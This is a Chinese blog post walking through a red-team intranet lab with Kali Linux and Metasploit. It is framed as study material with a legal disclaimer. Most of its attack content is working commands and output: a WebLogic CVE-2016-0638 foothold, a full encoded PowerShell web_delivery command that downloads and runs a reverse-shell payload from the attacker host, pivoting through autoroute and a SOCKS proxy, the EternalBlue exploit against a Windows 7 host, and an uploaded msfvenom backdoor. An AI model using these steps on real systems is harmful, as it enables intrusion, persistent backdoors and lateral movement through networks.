内网靶场 | 渗透攻击红队内网域渗透靶场-1(Metasploit)零基础入门到精通,收藏这一篇就够了

于 2024-10-04 08:00:00 发布
阅读量844 收藏 20
点赞数 15
分类专栏: 程序员 互联网 网络安全 文章标签: 安全 人工智能 数据挖掘
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Javachichi/article/details/142613565
版权
互联网 同时被 3 个专栏收录
847 篇文章 106 订阅
订阅专栏
程序员
772 篇文章 36 订阅
订阅专栏
网络安全
272 篇文章 11 订阅
订阅专栏

和昨天的文章同一套靶场,这次主要使用的是Kali Linux以及Metasploit来打靶场,熟悉一下MSF在内网渗透中的使用,仅供学习参考,大佬勿喷。本期文章靶场来自公众号:渗透攻击红队。

靶场下载地址:https://pan.baidu.com/s/1DOaDrsDsB2aW0sHSO_-fZQ``提取码: vbi2

声明:本文章仅对个人学习过程进行记录总结,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

01

环境简介

  • 攻击机:

  • Kali Linux:172.20.4.16

  • 靶机:

  • Windows Server 2012 R2:172.20.4.30、10.10.20.12

  • Windows 7 x64:10.10.20.7、10.10.10.7

  • Windows Server 2008 R2 x64:10.10.10.18

  • Windows Server 2008 R2 x64:10.10.10.8

02

**—
**

外网打点

信息收集

对目标IP使用nmap进行端口扫描

nmap -v -Pn -T3 -sV -n -sT --open 172.20.4.30``   ``# -v:表示启用详细模式(verbose mode),可以输出更详细的扫描信息``# -Pn:表示不进行主机存活性检测,即忽略主机的存活性,直接对目标进行端口扫描``# -T3:表示设置扫描速度为正常,默认速度。nmap支持-T0到-T5六个级别的速度,-T0最慢,-T5最快``# -sV:表示对目标进行服务版本检测,尝试识别目标主机上运行的服务及其版本信息``# -n:表示禁止进行DNS解析,使用IP地址而不是域名进行扫描``# -sT:表示使用TCP连接进行扫描``# --open:只显示有开放端口的主机,这样可以帮助过滤出真正活跃的主机

可以看到扫描到了7001端口存在weblogic

访问web可以看到经典的404界面

访问/console自动重定向到后台登录界面/console/login/LoginForm.jsp

在登录界面可以看到当前版本为12.1.3.0.0

Weblogic CVE-2016-0638

使用WebLogicTool进行漏洞检测

https://github.com/KimJun1010/WeblogicTool

存在CVE-2016-0638,administrator权限

命令执行查看一下系统信息

操作系统为Windows Server 2012 R2

msf的web_delivery模块

msfconsole``msf6 > use exploit/multi/script/web_delivery``msf6 exploit(multi/script/web_delivery) > info``   `       `Name: Script Web Delivery`     `Module: exploit/multi/script/web_delivery`   `Platform: Python, PHP, Windows, Linux, OSX`       `Arch:`` Privileged: No`    `License: Metasploit Framework License (BSD)`       `Rank: Manual`  `Disclosed: 2013-07-19``   ``Provided by:`  `Andrew Smith "jakx" <jakx.ppr@gmail.com>`  `Ben Campbell <eat_meatballs@hotmail.co.uk>`  `Chris Campbell`  `Casey Smith`  `Trenton Ivey`  `g0tmi1k`  `bcoles <bcoles@gmail.com>`  `Matt Nelson`  `phra`  `Nick Landers``   ``Available targets:`      `Id  Name`      `--  ----`  `=>  0   Python`      `1   PHP`      `2   PSH`      `3   Regsvr32`      `4   pubprn`      `5   SyncAppvPublishingServer`      `6   PSH (Binary)`      `7   Linux`      `8   Mac OS X``   ``Check supported:`  `No``   ``Basic options:`  `Name     Current Setting  Required  Description`  `----     ---------------  --------  -----------`  `SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.`  `SRVPORT  8080             yes       The local port to listen on.`  `SSL      false            no        Negotiate SSL for incoming connections`  `SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)`  `URIPATH                   no        The URI to use for this exploit (default is random)``   ``Payload information:``   ``Description:`  `This module quickly fires up a web server that serves a payload.``   `  `The module will provide a command to be run on the target machine`  `based on the selected target. The provided command will download`  `and execute a payload using either a specified scripting language`  `interpreter or "squiblydoo" via regsvr32.exe for bypassing`  `application whitelisting.``   `  `The main purpose of this module is to quickly establish a session on a`  `target machine when the attacker has to manually type in the command:`  `e.g. Command Injection, RDP Session, Local Access or maybe Remote`  `Command Execution.``   `  `This attack vector does not write to disk so it is less likely to`  `trigger AV solutions and will allow privilege escalations supplied`  `by Meterpreter.``   `  `When using either of the PSH targets, ensure the payload architecture`  `matches the target computer or use SYSWOW64 powershell.exe to execute`  `x86 payloads on x64 machines.``   `  `Regsvr32 uses "squiblydoo" technique to bypass application whitelisting.`  `The signed Microsoft binary file, Regsvr32, is able to request an .sct`  `file and then execute the included PowerShell command inside of it.``   `  `Similarly, the pubprn target uses the pubprn.vbs script to request and`  `execute a .sct file.``   `  `Both web requests (i.e., the .sct file and PowerShell download/execute)`  `can occur on the same port.``   `  `The SyncAppvPublishingServer target uses SyncAppvPublishingServer.exe`  `Microsoft signed binary to request and execute a PowerShell script. This`  `technique only works on Windows 10 builds <= 1709.``   `  `"PSH (Binary)" will write a file to the disk, allowing for custom binaries`  `to be served up to be downloaded and executed.``   ``References:`  `https://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html`  `https://www.pentestgeek.com/2013/07/19/invoke-shellcode/`  `http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/`  `https://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html`  `https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html`  `https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/`  `https://iwantmore.pizza/posts/amsi.html`  `https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/`  `https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/`  `https://lolbas-project.github.io/lolbas/Scripts/Pubprn/``   ``   ``View the full module info with the info -d command.``   ``msf6 exploit(multi/script/web_delivery) > show options``   ``Module options (exploit/multi/script/web_delivery):``   `   `Name     Current Setting  Required  Description`   `----     ---------------  --------  -----------`   `SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.`   `SRVPORT  8080             yes       The local port to listen on.`   `SSL      false            no        Negotiate SSL for incoming connections`   `SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)`   `URIPATH                   no        The URI to use for this exploit (default is random)``   ``   ``Payload options (python/meterpreter/reverse_tcp):``   `   `Name   Current Setting  Required  Description`   `----   ---------------  --------  -----------`   `LHOST                   yes       The listen address (an interface may be specified)`   `LPORT  4444             yes       The listen port``   ``   ``Exploit target:``   `   `Id  Name`   `--  ----`   `0   Python``   ``   ``   ``View the full module info with the info, or info -d command.

可以看到默认是监听本地的8080端口,支持9种类型的payload,这里使用PSH,反弹shell的payload使用windows/x64/meterpreter/reverse_tcp

msf6 exploit(multi/script/web_delivery) > set target 2``msf6 exploit(multi/script/web_delivery) > set payload windows/x64/meterpreter/reverse_tcp``msf6 exploit(multi/script/web_delivery) > set lhost 172.20.4.16``msf6 exploit(multi/script/web_delivery) > options``   ``Module options (exploit/multi/script/web_delivery):``   `   `Name     Current Setting  Required  Description`   `----     ---------------  --------  -----------`   `SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.`   `SRVPORT  8080             yes       The local port to listen on.`   `SSL      false            no        Negotiate SSL for incoming connections`   `SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)`   `URIPATH                   no        The URI to use for this exploit (default is random)``   ``   ``Payload options (windows/x64/meterpreter/reverse_tcp):``   `   `Name      Current Setting  Required  Description`   `----      ---------------  --------  -----------`   `EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)`   `LHOST     172.20.4.16      yes       The listen address (an interface may be specified)`   `LPORT     4444             yes       The listen port``   ``   ``Exploit target:``   `   `Id  Name`   `--  ----`   `2   PSH``   ``   ``   ``View the full module info with the info, or info -d command.``   ``msf6 exploit(multi/script/web_delivery) > run``[*] Exploit running as background job 0.``[*] Exploit completed, but no session was created.``   ``[*] Started reverse TCP handler on 172.20.4.16:4444` `msf6 exploit(multi/script/web_delivery) > [*] Using URL: http://172.20.4.16:8080/K4i2VMdAmipU``[*] Server started.``[*] Run the following command on the target machine:``powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJAB0AEEAZwB6ADUAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AGkAZgAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFAAcgBvAHgAeQBdADoAOgBHAGUAdABEAGUAZgBhAHUAbAB0AFAAcgBvAHgAeQAoACkALgBhAGQAZAByAGUAcwBzACAALQBuAGUAIAAkAG4AdQBsAGwAKQB7ACQAdABBAGcAegA1AC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7ACQAdABBAGcAegA1AC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA3ADIALgAyADAALgA0AC4AMQA2ADoAOAAwADgAMAAvAEsANABpADIAVgBNAGQAQQBtAGkAcABVAC8AZgBpADAAQgAyAGUAagAnACkAKQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA3ADIALgAyADAALgA0AC4AMQA2ADoAOAAwADgAMAAvAEsANABpADIAVgBNAGQAQQBtAGkAcABVACcAKQApADsA

会生成一段反弹shell的powershell命令

powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJAB0AEEAZwB6ADUAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AGkAZgAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFAAcgBvAHgAeQBdADoAOgBHAGUAdABEAGUAZgBhAHUAbAB0AFAAcgBvAHgAeQAoACkALgBhAGQAZAByAGUAcwBzACAALQBuAGUAIAAkAG4AdQBsAGwAKQB7ACQAdABBAGcAegA1AC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7ACQAdABBAGcAegA1AC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA3ADIALgAyADAALgA0AC4AMQA2ADoAOAAwADgAMAAvAEsANABpADIAVgBNAGQAQQBtAGkAcABVAC8AZgBpADAAQgAyAGUAagAnACkAKQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA3ADIALgAyADAALgA0AC4AMQA2ADoAOAAwADgAMAAvAEsANABpADIAVgBNAGQAQQBtAGkAcABVACcAKQApADsA

使用WebLogicTool的命令执行功能在目标机器上执行,稍等一会就能得到一个session

进入这个session,可以看到拿到了一个administrator的meterpreter会话

msf6 exploit(multi/script/web_delivery) > sessions``   ``Active sessions``===============``   `  `Id  Name  Type                     Information                        Connection`  `--  ----  ----                     -----------                        ----------`  `1         meterpreter x64/windows  WEBLOGIC\Administrator @ WEBLOGIC  172.20.4.16:4444 -> 172.20.4.30:59631 (172.20.4.30)``   ``msf6 exploit(multi/script/web_delivery) > sessions 1``[*] Starting interaction with 1...``   ``meterpreter > getuid``Server username: WEBLOGIC\Administrator

进入交互式shell,查看当前机器网络配置信息

meterpreter > shell``C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain>chcp 65001 # 切换为UTF-8编码,解决乱码问题``C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain>ipconfig``ipconfig``   ``Windows IP Configuration``   ``   ``Ethernet adapter Ethernet1:``   `   `Connection-specific DNS Suffix  . :``   Link-local IPv6 Address . . . . . : fe80::4116:2a67:3c40:e05c%14`   `IPv4 Address. . . . . . . . . . . : 10.10.20.12`   `Subnet Mask . . . . . . . . . . . : 255.255.255.0`   `Default Gateway . . . . . . . . . : 10.10.20.1``   ``Ethernet adapter Ethernet0:``   `   `Connection-specific DNS Suffix  . :``   Link-local IPv6 Address . . . . . : fe80::ccb5:101a:b773:f705%12`   `IPv4 Address. . . . . . . . . . . : 172.20.4.30`   `Subnet Mask . . . . . . . . . . . : 255.255.252.0`   `Default Gateway . . . . . . . . . : 172.20.7.254``   ``Tunnel adapter isatap.{E7ECCBFA-0D99-4183-B53D-C83F88C7D49C}:``   `   `Media State . . . . . . . . . . . : Media disconnected`   `Connection-specific DNS Suffix  . :` `   ``Tunnel adapter isatap.{8F6412DB-D757-413C-97E1-76F7DB61BD9C}:``   `   `Media State . . . . . . . . . . . : Media disconnected`   `Connection-specific DNS Suffix  . :

可以看到还有一张10.10.20.12网卡,存在内网

探测一下每个网段下的主机

meterpreter > arp -a``   ``ARP cache``=========``   `    `IP address       MAC address        Interface`    `----------       -----------        ---------`    `10.10.20.7       00:0c:29:91:d2:55  Intel(R) 82574L ������������ #2`    `10.10.20.128     00:50:56:e7:08:15  Intel(R) 82574L ������������ #2`    `10.10.20.255     ff:ff:ff:ff:ff:ff  Intel(R) 82574L ������������ #2`    `......

简单测试一下当前机器是否在域环境中

C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain>net config workstation``net config workstation``Computer name                        \\WEBLOGIC``Full Computer name                   weblogic``User name                            Administrator``   ``Workstation active on                ``        NetBT_Tcpip_{E7ECCBFA-0D99-4183-B53D-C83F88C7D49C} (000C2984D6EB)`        `NetBT_Tcpip_{8F6412DB-D757-413C-97E1-76F7DB61BD9C} (000C2984D6E1)``   ``Software version                     Windows Server 2012 R2 Datacenter``   ``Workstation domain                   WORKGROUP``Logon domain                         WEBLOGIC``   ``COM Open Timeout (sec)               0``COM Send Count (byte)                16``COM Send Timeout (msec)              250``The command completed successfully.

不存在域环境

03

**—
**

**内网渗透
**

内网信息收集

此时MSF是访问不到10.10.20.x网段下的主机的,需要添加路由

meterpreter > run get_local_subnets``   ``[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.``[!] Example: run post/multi/manage/autoroute OPTION=value [...]``Local subnet: 10.10.20.0/255.255.255.0``Local subnet: 172.20.4.0/255.255.252.0``......``meterpreter > run autoroute -s 10.10.20.0/24``   ``[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.``[!] Example: run post/multi/manage/autoroute OPTION=value [...]``[*] Adding a route to 10.10.20.0/255.255.255.0...``[+] Added route to 10.10.20.0/255.255.255.0 via 172.20.4.30``[*] Use the -p option to list all active routes``meterpreter > run autoroute -p``   ``[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.``[!] Example: run post/multi/manage/autoroute OPTION=value [...]``   ``Active Routing Table``====================``   `   `Subnet             Netmask            Gateway`   `------             -------            -------`   `10.10.20.0         255.255.255.0      Session 1

先挂起当前会话

meterpreter > background

再开启一个socks5代理

msf6 > use auxiliary/server/socks_proxy``msf6 auxiliary(server/socks_proxy) > show options``   ``Module options (auxiliary/server/socks_proxy):``   `   `Name     Current Setting  Required  Description`   `----     ---------------  --------  -----------`   `SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.`   `SRVPORT  1080             yes       The port to listen on`   `VERSION  5                yes       The SOCKS version to use (Accepted: 4a, 5)``   ``   `   `When VERSION is 5:``   `   `Name      Current Setting  Required  Description`   `----      ---------------  --------  -----------`   `PASSWORD                   no        Proxy password for SOCKS5 listener`   `USERNAME                   no        Proxy username for SOCKS5 listener``   ``   ``Auxiliary action:``   `   `Name   Description`   `----   -----------`   `Proxy  Run a SOCKS proxy server``   ``   ``   ``View the full module info with the info, or info -d command.``   ``msf6 auxiliary(server/socks_proxy) > run``[*] Auxiliary module running as background job 2.``msf6 auxiliary(server/socks_proxy) >` `[*] Starting the SOCKS proxy server

代理默认开在本机的1080端口

设置msf的全局代理

msf6 > setg Proxies socks5:172.20.4.16:1080 # msf设置全局代理``msf6 > setg ReverseAllowProxy true # 允许通过代理反弹shell

接下来对内网进行探测

使用smb_version模块扫描10.10.20.x网段

msf6 > use auxiliary/scanner/smb/smb_version``msf6 auxiliary(scanner/smb/smb_version) > show options``   ``Module options (auxiliary/scanner/smb/smb_version):``   `   `Name     Current Setting  Required  Description`   `----     ---------------  --------  -----------`   `RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html`   `THREADS  1                yes       The number of concurrent threads (max one per host)``   ``   ``View the full module info with the info, or info -d command.``   ``msf6 auxiliary(scanner/smb/smb_version) > set rhost 10.10.20.0/24``rhost => 10.10.20.0/24``msf6 auxiliary(scanner/smb/smb_version) > set THREADS 20``THREADS => 20``msf6 auxiliary(scanner/smb/smb_version) > run``   ``[*] 10.10.20.7:445        - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:22h 18m 12s) (guid:{bee2a945-4517-4cb6-8984-bf40080e2ac1}) (authentication domain:REDTEAM)Windows 7 Ultimate SP1 (build:7601) (name:WORK-7) (domain:REDTEAM)``[+] 10.10.20.7:445        -   Host is running SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:22h 18m 12s) (guid:{bee2a945-4517-4cb6-8984-bf40080e2ac1}) (authentication domain:REDTEAM)Windows 7 Ultimate SP1 (build:7601) (name:WORK-7) (domain:REDTEAM)``[*] 10.10.20.12:445       - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:1w 2d 17h 43m 38s) (guid:{bb50a56a-c79a-4c31-9b65-3759176f55b4}) (authentication domain:WEBLOGIC)Windows 2012 R2 Datacenter (build:9600) (name:WEBLOGIC)``[+] 10.10.20.12:445       -   Host is running SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:1w 2d 17h 43m 38s) (guid:{bb50a56a-c79a-4c31-9b65-3759176f55b4}) (authentication domain:WEBLOGIC)Windows 2012 R2 Datacenter (build:9600) (name:WEBLOGIC)``......

可以看到还有一台Windows 7系统的机器,主机名为WORK-7,IP为10.10.20.7

MS17-010永恒之蓝上线WORK-7

可以尝试使用永恒之蓝去打

查找ms17-010相关exp

msf6 > search ms17-010``   ``Matching Modules``================``   `   `#  Name                                      Disclosure Date  Rank     Check  Description`   `-  ----                                      ---------------  ----     -----  -----------`   `0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption`   `1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution`   `2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution`   `3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection`   `4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution``   ``   ``Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce

可以先使用auxiliary/scanner/smb/smb_ms17_010去检测

msf6 > use 3``msf6 auxiliary(scanner/smb/smb_ms17_010) > show options``   ``Module options (auxiliary/scanner/smb/smb_ms17_010):``   `   `Name         Current Setting                                           Required  Description`   `----         ---------------                                           --------  -----------`   `CHECK_ARCH   true                                                      no        Check for architecture on vulnerable hosts`   `CHECK_DOPU   true                                                      no        Check for DOUBLEPULSAR on vulnerable hosts`   `CHECK_PIPE   false                                                     no        Check for named pipe on vulnerable hosts`   `NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pip  yes       List of named pipes to check`                `es.txt`   `RHOSTS                                                                 yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html`   `RPORT        445                                                       yes       The SMB service port (TCP)`   `SMBDomain    .                                                         no        The Windows domain to use for authentication`   `SMBPass                                                                no        The password for the specified username`   `SMBUser                                                                no        The username to authenticate as`   `THREADS      1                                                         yes       The number of concurrent threads (max one per host)``   ``   ``View the full module info with the info, or info -d command.``   ``msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.10.20.7``rhosts => 10.10.20.7``msf6 auxiliary(scanner/smb/smb_ms17_010) > run``   ``[+] 10.10.20.7:445        - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)``[*] 10.10.20.7:445        - Scanned 1 of 1 hosts (100% complete)``[*] Auxiliary module execution completed

显示在目标机器上利用永恒之蓝漏洞

使用exploit/windows/smb/ms17_010_eternalblue进行攻击

msf6 > use exploit/windows/smb/ms17_010_eternalblue``msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp``msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.10.20.7``msf6 exploit(windows/smb/ms17_010_eternalblue) > set lport 5555``msf6 exploit(windows/smb/ms17_010_eternalblue) > run``   ``[*] 10.10.20.7:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check``[+] 10.10.20.7:445        - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)``[*] 10.10.20.7:445        - Scanned 1 of 1 hosts (100% complete)``[+] 10.10.20.7:445 - The target is vulnerable.``[*] 10.10.20.7:445 - Connecting to target for exploitation.``[+] 10.10.20.7:445 - Connection established for exploitation.``[+] 10.10.20.7:445 - Target OS selected valid for OS indicated by SMB reply``[*] 10.10.20.7:445 - CORE raw buffer dump (38 bytes)``[*] 10.10.20.7:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima``[*] 10.10.20.7:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service` `[*] 10.10.20.7:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1`          `[+] 10.10.20.7:445 - Target arch selected valid for arch indicated by DCE/RPC reply``[*] 10.10.20.7:445 - Trying exploit with 12 Groom Allocations.``[*] 10.10.20.7:445 - Sending all but last fragment of exploit packet``[*] 10.10.20.7:445 - Starting non-paged pool grooming``[+] 10.10.20.7:445 - Sending SMBv2 buffers``[+] 10.10.20.7:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.``[*] 10.10.20.7:445 - Sending final SMBv2 buffers.``[*] 10.10.20.7:445 - Sending last fragment of exploit packet!``[*] 10.10.20.7:445 - Receiving response from exploit packet``[+] 10.10.20.7:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!``[*] 10.10.20.7:445 - Sending egg to corrupted connection.``[*] 10.10.20.7:445 - Triggering free of corrupted buffer.``[*] Started bind TCP handler against 10.10.20.7:5555``[*] Sending stage (201798 bytes) to 10.10.20.7``[+] 10.10.20.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=``[+] 10.10.20.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=``[+] 10.10.20.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=``[*] Meterpreter session 2 opened (10.10.20.12:63973 -> 10.10.20.7:5555 via session 1) at 2024-03-25 10:20:28 +0800``   ``meterpreter > getuid``Server username: NT AUTHORITY\SYSTEM``meterpreter > sysinfo``Computer        : WORK-7``OS              : Windows 7 (6.1 Build 7601, Service Pack 1).``Architecture    : x64``System Language : zh_CN``Domain          : REDTEAM``Logged On Users : 2``Meterpreter     : x64/windows

尝试了多次才成功,拿到了WORK-7的SYSTEM权限,查看系统信息可以看到存在域REDTEAM

怕当前meterpreter不稳定,生成一个正向连接的exe后门

msfvenom -p windows/x64/meterpreter/bind_tcp lhost=172.20.4.16 lport=6666 -f exe > 6666.exe``   ``[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload``[-] No arch selected, selecting arch: x64 from the payload``No encoder specified, outputting raw payload``Payload size: 496 bytes``Final size of exe file: 7168 bytes

上传6666.exe到目标机器并执行

meterpreter > upload /root/桌面/6666.exe c:\\``[*] Uploading  : /root/桌面/6666.exe -> c:\6666.exe`                                                                                                                                          `[*] Completed  : /root/桌面/6666.exe -> c:\6666.exe``meterpreter > ls c:`                                                                                                                                                                          `Listing: c:`                                                                                                                                                                                  `===========``   ``Mode              Size    Type  Last modified              Name``----              ----    ----  -------------              ----``040777/rwxrwxrwx  0       dir   2021-11-05 18:27:12 +0800  $Recycle.Bin``100777/rwxrwxrwx  7168    fil   2024-03-25 10:29:34 +0800  6666.exe``040777/rwxrwxrwx  0       dir   2009-07-14 13:08:56 +0800  Documents and Settings``040777/rwxrwxrwx  0       dir   2009-07-14 11:20:08 +0800  PerfLogs``040555/r-xr-xr-x  4096    dir   2024-03-15 16:05:22 +0800  Program Files``040555/r-xr-xr-x  4096    dir   2021-11-05 18:29:05 +0800  Program Files (x86)``040777/rwxrwxrwx  4096    dir   2021-11-05 18:29:05 +0800  ProgramData``040777/rwxrwxrwx  0       dir   2021-11-05 17:00:46 +0800  Recovery``040777/rwxrwxrwx  8192    dir   2024-03-23 21:12:06 +0800  System Volume Information``040555/r-xr-xr-x  4096    dir   2021-11-05 18:28:43 +0800  Users``040777/rwxrwxrwx  16384   dir   2024-03-24 10:16:18 +0800  Windows``000000/---------  0       fif   1970-01-01 08:00:00 +0800  pagefile.sys``100777/rwxrwxrwx  295936  fil   2024-03-24 10:29:05 +0800  windowstempzhuanfa.exe``   ``meterpreter > shell``   ``C:\Windows\system32>c:/6666.exe

挂起当前会话,设置监听

C:\Windows\system32>exit``meterpreter > background` `[*] Backgrounding session 2...``msf6 exploit(multi/handler) > use exploit/multi/handler``msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp``msf6 exploit(multi/handler) > set lport 6666``msf6 exploit(multi/handler) > set rhost 10.10.20.7``msf6 exploit(multi/handler) > run``   ``[*] Started bind TCP handler against 10.10.20.7:6666``[*] Sending stage (201798 bytes) to 10.10.20.7``[*] Meterpreter session 3 opened (10.10.20.12:49268 -> 10.10.20.7:6666 via session 1) at 2024-03-25 10:47:43 +0800``   ``meterpreter > getuid``Server username: NT AUTHORITY\SYSTEM``meterpreter > sysinfo``Computer        : WORK-7``OS              : Windows 7 (6.1 Build 7601, Service Pack 1).``Architecture    : x64``System Language : zh_CN``Domain          : REDTEAM``Logged On Users : 3``Meterpreter     : x64/windows

成功连接正向后门,对当前机器进行信息收集

